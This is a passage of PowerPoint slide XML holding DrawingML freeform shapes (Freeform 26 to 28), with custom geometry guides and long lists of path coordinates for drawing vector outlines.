                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="142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8" name="Freeform 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3221038" y="1758950"/>
                <a:ext cx="225425" cy="215900"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 626"/>
                  <a:gd name="T1" fmla="*/ 331 h 600"/>
                  <a:gd name="T2" fmla="*/ 6 w 626"/>
                  <a:gd name="T3" fmla="*/ 262 h 600"/>
                  <a:gd name="T4" fmla="*/ 0 w 626"/>
                  <a:gd name="T5" fmla="*/ 226 h 600"/>
                  <a:gd name="T6" fmla="*/ 0 w 626"/>
                  <a:gd name="T7" fmla="*/ 194 h 600"/>
                  <a:gd name="T8" fmla="*/ 32 w 626"/>
                  <a:gd name="T9" fmla="*/ 131 h 600"/>
                  <a:gd name="T10" fmla="*/ 53 w 626"/>
                  <a:gd name="T11" fmla="*/ 100 h 600"/>
                  <a:gd name="T12" fmla="*/ 79 w 626"/>
                  <a:gd name="T13" fmla="*/ 74 h 600"/>
                  <a:gd name="T14" fmla="*/ 168 w 626"/>
                  <a:gd name="T15" fmla="*/ 11 h 600"/>
                  <a:gd name="T16" fmla="*/ 205 w 626"/>
                  <a:gd name="T17" fmla="*/ 0 h 600"/>
                  <a:gd name="T18" fmla="*/ 236 w 626"/>
                  <a:gd name="T19" fmla="*/ 0 h 600"/>
                  <a:gd name="T20" fmla="*/ 294 w 626"/>
                  <a:gd name="T21" fmla="*/ 21 h 600"/>
                  <a:gd name="T22" fmla="*/ 320 w 626"/>
                  <a:gd name="T23" fmla="*/ 42 h 600"/>
                  <a:gd name="T24" fmla="*/ 541 w 626"/>
                  <a:gd name="T25" fmla="*/ 284 h 600"/>
                  <a:gd name="T26" fmla="*/ 583 w 626"/>
                  <a:gd name="T27" fmla="*/ 331 h 600"/>
                  <a:gd name="T28" fmla="*/ 625 w 626"/>
                  <a:gd name="T29" fmla="*/ 352 h 600"/>
                  <a:gd name="T30" fmla="*/ 525 w 626"/>
                  <a:gd name="T31" fmla="*/ 446 h 600"/>
                  <a:gd name="T32" fmla="*/ 499 w 626"/>
                  <a:gd name="T33" fmla="*/ 431 h 600"/>
                  <a:gd name="T34" fmla="*/ 473 w 626"/>
                  <a:gd name="T35" fmla="*/ 415 h 600"/>
                  <a:gd name="T36" fmla="*/ 473 w 626"/>
                  <a:gd name="T37" fmla="*/ 462 h 600"/>
                  <a:gd name="T38" fmla="*/ 467 w 626"/>
                  <a:gd name="T39" fmla="*/ 494 h 600"/>
                  <a:gd name="T40" fmla="*/ 441 w 626"/>
                  <a:gd name="T41" fmla="*/ 530 h 600"/>
                  <a:gd name="T42" fmla="*/ 410 w 626"/>
                  <a:gd name="T43" fmla="*/ 562 h 600"/>
                  <a:gd name="T44" fmla="*/ 352 w 626"/>
                  <a:gd name="T45" fmla="*/ 593 h 600"/>
                  <a:gd name="T46" fmla="*/ 326 w 626"/>
                  <a:gd name="T47" fmla="*/ 599 h 600"/>
                  <a:gd name="T48" fmla="*/ 300 w 626"/>
                  <a:gd name="T49" fmla="*/ 593 h 600"/>
                  <a:gd name="T50" fmla="*/ 247 w 626"/>
                  <a:gd name="T51" fmla="*/ 572 h 600"/>
                  <a:gd name="T52" fmla="*/ 226 w 626"/>
                  <a:gd name="T53" fmla="*/ 556 h 600"/>
                  <a:gd name="T54" fmla="*/ 205 w 626"/>
                  <a:gd name="T55" fmla="*/ 535 h 600"/>
                  <a:gd name="T56" fmla="*/ 168 w 626"/>
                  <a:gd name="T57" fmla="*/ 478 h 600"/>
                  <a:gd name="T58" fmla="*/ 158 w 626"/>
                  <a:gd name="T59" fmla="*/ 452 h 600"/>
                  <a:gd name="T60" fmla="*/ 153 w 626"/>
                  <a:gd name="T61" fmla="*/ 425 h 600"/>
                  <a:gd name="T62" fmla="*/ 163 w 626"/>
                  <a:gd name="T63" fmla="*/ 368 h 600"/>
                  <a:gd name="T64" fmla="*/ 179 w 626"/>
                  <a:gd name="T65" fmla="*/ 341 h 600"/>
                  <a:gd name="T66" fmla="*/ 242 w 626"/>
                  <a:gd name="T67" fmla="*/ 241 h 600"/>
                  <a:gd name="T68" fmla="*/ 252 w 626"/>
                  <a:gd name="T69" fmla="*/ 215 h 600"/>
                  <a:gd name="T70" fmla="*/ 257 w 626"/>
                  <a:gd name="T71" fmla="*/ 194 h 600"/>
                  <a:gd name="T72" fmla="*/ 242 w 626"/>
                  <a:gd name="T73" fmla="*/ 152 h 600"/>
                  <a:gd name="T74" fmla="*/ 216 w 626"/>
                  <a:gd name="T75" fmla="*/ 131 h 600"/>
                  <a:gd name="T76" fmla="*/ 195 w 626"/>
                  <a:gd name="T77" fmla="*/ 126 h 600"/>
                  <a:gd name="T78" fmla="*/ 173 w 626"/>
                  <a:gd name="T79" fmla="*/ 126 h 600"/>
                  <a:gd name="T80" fmla="*/ 147 w 626"/>
                  <a:gd name="T81" fmla="*/ 147 h 600"/>
                  <a:gd name="T82" fmla="*/ 121 w 626"/>
                  <a:gd name="T83" fmla="*/ 178 h 600"/>
                  <a:gd name="T84" fmla="*/ 121 w 626"/>
                  <a:gd name="T85" fmla="*/ 194 h 600"/>
                  <a:gd name="T86" fmla="*/ 142 w 626"/>
                  <a:gd name="T87" fmla="*/ 241 h 600"/>
                  <a:gd name="T88" fmla="*/ 58 w 626"/>
                  <a:gd name="T89" fmla="*/ 341 h 600"/>
                  <a:gd name="T90" fmla="*/ 315 w 626"/>
                  <a:gd name="T91" fmla="*/ 284 h 600"/>
                  <a:gd name="T92" fmla="*/ 300 w 626"/>
                  <a:gd name="T93" fmla="*/ 310 h 600"/>
                  <a:gd name="T94" fmla="*/ 279 w 626"/>
                  <a:gd name="T95" fmla="*/ 347 h 600"/>
                  <a:gd name="T96" fmla="*/ 273 w 626"/>
                  <a:gd name="T97" fmla="*/ 373 h 600"/>
                  <a:gd name="T98" fmla="*/ 300 w 626"/>
                  <a:gd name="T99" fmla="*/ 431 h 600"/>
                  <a:gd name="T100" fmla="*/ 320 w 626"/>
                  <a:gd name="T101" fmla="*/ 452 h 600"/>
                  <a:gd name="T102" fmla="*/ 342 w 626"/>
                  <a:gd name="T103" fmla="*/ 462 h 600"/>
                  <a:gd name="T104" fmla="*/ 368 w 626"/>
                  <a:gd name="T105" fmla="*/ 467 h 600"/>
                  <a:gd name="T106" fmla="*/ 389 w 626"/>
                  <a:gd name="T107" fmla="*/ 452 h 600"/>
                  <a:gd name="T108" fmla="*/ 410 w 626"/>
                  <a:gd name="T109" fmla="*/ 431 h 600"/>
                  <a:gd name="T110" fmla="*/ 420 w 626"/>
                  <a:gd name="T111" fmla="*/ 399 h 600"/>
                  <a:gd name="T112" fmla="*/ 420 w 626"/>
                  <a:gd name="T113" fmla="*/ 383 h 600"/>
                  <a:gd name="T114" fmla="*/ 420 w 626"/>
                  <a:gd name="T115" fmla="*/ 368 h 600"/>
                  <a:gd name="T116" fmla="*/ 399 w 626"/>
                  <a:gd name="T117" fmla="*/ 331 h 600"/>
                  <a:gd name="T118" fmla="*/ 326 w 626"/>
                  <a:gd name="T119" fmla="*/ 247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26" h="600">
                    <a:moveTo>
                      <a:pt x="48" y="331"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="331"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="315" y="284"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="315" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="284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9" name="Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3303588" y="1625600"/>
                <a:ext cx="206375" cy="242888"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 111 w 574"/>
                  <a:gd name="T1" fmla="*/ 0 h 673"/>
                  <a:gd name="T2" fmla="*/ 573 w 574"/>
                  <a:gd name="T3" fmla="*/ 582 h 673"/>
                  <a:gd name="T4" fmla="*/ 462 w 574"/>
                  <a:gd name="T5" fmla="*/ 672 h 673"/>
                  <a:gd name="T6" fmla="*/ 0 w 574"/>
                  <a:gd name="T7" fmla="*/ 89 h 673"/>
                  <a:gd name="T8" fmla="*/ 111 w 574"/>
                  <a:gd name="T9" fmla="*/ 0 h 6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4" h="673">
                    <a:moveTo>
                      <a:pt x="111" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="573" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111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80" name="Freeform 28"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3479800" y="1473200"/>
                <a:ext cx="244475" cy="271463"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 372 w 678"/>
                  <a:gd name="T1" fmla="*/ 593 h 752"/>
                  <a:gd name="T2" fmla="*/ 409 w 678"/>
                  <a:gd name="T3" fmla="*/ 614 h 752"/>
                  <a:gd name="T4" fmla="*/ 446 w 678"/>
                  <a:gd name="T5" fmla="*/ 620 h 752"/>
                  <a:gd name="T6" fmla="*/ 488 w 678"/>
                  <a:gd name="T7" fmla="*/ 599 h 752"/>
                  <a:gd name="T8" fmla="*/ 530 w 678"/>
                  <a:gd name="T9" fmla="*/ 546 h 752"/>
                  <a:gd name="T10" fmla="*/ 530 w 678"/>
                  <a:gd name="T11" fmla="*/ 510 h 752"/>
                  <a:gd name="T12" fmla="*/ 514 w 678"/>
                  <a:gd name="T13" fmla="*/ 473 h 752"/>
                  <a:gd name="T14" fmla="*/ 482 w 678"/>
                  <a:gd name="T15" fmla="*/ 441 h 752"/>
                  <a:gd name="T16" fmla="*/ 446 w 678"/>
                  <a:gd name="T17" fmla="*/ 426 h 752"/>
                  <a:gd name="T18" fmla="*/ 398 w 678"/>
                  <a:gd name="T19" fmla="*/ 426 h 752"/>
                  <a:gd name="T20" fmla="*/ 283 w 678"/>
                  <a:gd name="T21" fmla="*/ 452 h 752"/>
                  <a:gd name="T22" fmla="*/ 199 w 678"/>
                  <a:gd name="T23" fmla="*/ 457 h 752"/>
                  <a:gd name="T24" fmla="*/ 131 w 678"/>
                  <a:gd name="T25" fmla="*/ 441 h 752"/>
                  <a:gd name="T26" fmla="*/ 73 w 678"/>
                  <a:gd name="T27" fmla="*/ 394 h 752"/>
                  <a:gd name="T28" fmla="*/ 20 w 678"/>
                  <a:gd name="T29" fmla="*/ 316 h 752"/>
                  <a:gd name="T30" fmla="*/ 10 w 678"/>
                  <a:gd name="T31" fmla="*/ 189 h 752"/>
                  <a:gd name="T32" fmla="*/ 47 w 678"/>
                  <a:gd name="T33" fmla="*/ 116 h 752"/>
                  <a:gd name="T34" fmla="*/ 120 w 678"/>
                  <a:gd name="T35" fmla="*/ 52 h 752"/>
                  <a:gd name="T36" fmla="*/ 199 w 678"/>
                  <a:gd name="T37" fmla="*/ 11 h 752"/>
                  <a:gd name="T38" fmla="*/ 283 w 678"/>
                  <a:gd name="T39" fmla="*/ 0 h 752"/>
                  <a:gd name="T40" fmla="*/ 357 w 678"/>
                  <a:gd name="T41" fmla="*/ 26 h 752"/>
                  <a:gd name="T42" fmla="*/ 430 w 678"/>
                  <a:gd name="T43" fmla="*/ 105 h 752"/>
                  <a:gd name="T44" fmla="*/ 283 w 678"/>
                  <a:gd name="T45" fmla="*/ 152 h 752"/>
                  <a:gd name="T46" fmla="*/ 251 w 678"/>
                  <a:gd name="T47" fmla="*/ 132 h 752"/>
                  <a:gd name="T48" fmla="*/ 199 w 678"/>
                  <a:gd name="T49" fmla="*/ 132 h 752"/>
                  <a:gd name="T50" fmla="*/ 167 w 678"/>
                  <a:gd name="T51" fmla="*/ 152 h 752"/>
                  <a:gd name="T52" fmla="*/ 147 w 678"/>
                  <a:gd name="T53" fmla="*/ 184 h 752"/>
                  <a:gd name="T54" fmla="*/ 141 w 678"/>
                  <a:gd name="T55" fmla="*/ 216 h 752"/>
                  <a:gd name="T56" fmla="*/ 162 w 678"/>
                  <a:gd name="T57" fmla="*/ 257 h 752"/>
                  <a:gd name="T58" fmla="*/ 204 w 678"/>
                  <a:gd name="T59" fmla="*/ 299 h 752"/>
                  <a:gd name="T60" fmla="*/ 236 w 678"/>
                  <a:gd name="T61" fmla="*/ 305 h 752"/>
                  <a:gd name="T62" fmla="*/ 404 w 678"/>
                  <a:gd name="T63" fmla="*/ 279 h 752"/>
                  <a:gd name="T64" fmla="*/ 482 w 678"/>
                  <a:gd name="T65" fmla="*/ 273 h 752"/>
                  <a:gd name="T66" fmla="*/ 545 w 678"/>
                  <a:gd name="T67" fmla="*/ 284 h 752"/>
                  <a:gd name="T68" fmla="*/ 593 w 678"/>
                  <a:gd name="T69" fmla="*/ 316 h 752"/>
                  <a:gd name="T70" fmla="*/ 629 w 678"/>
                  <a:gd name="T71" fmla="*/ 363 h 752"/>
                  <a:gd name="T72" fmla="*/ 677 w 678"/>
                  <a:gd name="T73" fmla="*/ 504 h 752"/>
                  <a:gd name="T74" fmla="*/ 651 w 678"/>
                  <a:gd name="T75" fmla="*/ 583 h 752"/>
                  <a:gd name="T76" fmla="*/ 540 w 678"/>
                  <a:gd name="T77" fmla="*/ 693 h 752"/>
                  <a:gd name="T78" fmla="*/ 441 w 678"/>
                  <a:gd name="T79" fmla="*/ 740 h 752"/>
                  <a:gd name="T80" fmla="*/ 357 w 678"/>
                  <a:gd name="T81" fmla="*/ 746 h 752"/>
                  <a:gd name="T82" fmla="*/ 251 w 678"/>
                  <a:gd name="T83" fmla="*/ 683 h 752"/>
                  <a:gd name="T84" fmla="*/ 331 w 678"/>
                  <a:gd name="T85" fmla="*/ 541 h 7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678" h="752">
                    <a:moveTo>
                      <a:pt x="346" y="557"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="346" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
